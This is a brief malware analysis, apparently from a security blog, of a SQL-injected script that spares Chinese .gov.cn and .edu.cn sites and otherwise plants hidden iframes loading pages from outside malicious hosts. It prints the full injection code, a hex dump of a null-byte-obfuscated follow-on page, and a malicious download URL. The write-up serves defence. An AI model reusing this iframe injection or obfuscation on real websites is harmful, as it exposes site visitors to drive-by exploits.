3b3.org/c.js
This sql-injected script src has been around for some time.
The interesting point of this script is that it behaves differently if the injected site is from “.gov.cn” or “.edu.cn”. Code as shown below:
var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0){
document.writeln("<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></
iframe>");
function rl()
{
var msgObj = document.createElement("div");
msgObj.setAttribute("id","msgDiv");
document.body.appendChild(msgObj);
var obj = document.getElementById("msgDiv");
obj.innerHTML ="<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></
iframe>";
}
setInterval("rl()",10000);
}
The injected iframe a100.htm inserts another iframe au.htm.
au.htm deploys another obfuscation technique, which is to embed null bytes into the file. The top portion of the file is as shown:
00000000 3c 00 00 68 00 74 00 6d 6c 3e 00 00 0d 0a 00 00 |<..h.t.ml>......|
00000010 3c 00 00 73 00 00 63 72 00 69 00 00 70 00 00 74 |<..s..cr.i..p..t|
00000020 00 3e 00 00 0d 00 00 0a 69 00 00 66 00 28 00 6e |.>......i..f.(.n|
00000030 00 00 61 76 00 69 00 67 61 00 74 00 6f 72 2e 00 |..av.i.ga.t.or..|
00000040 00 75 00 00 73 00 65 00 00 72 00 00 41 67 00 00 |.u..s.e..r..Ag..|
00000050 65 00 00 6e 74 00 2e 74 00 00 6f 00 00 4c 6f 00 |e..nt..t..o..Lo.|
00000060 77 65 72 00 00 43 61 73 65 00 28 29 00 00 2e 00 |wer..Case.()....|
If all the bytes 00 are removed, you get back a beautiful html file.
au.htm contains links to exploits of typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css [Threatexpert result]
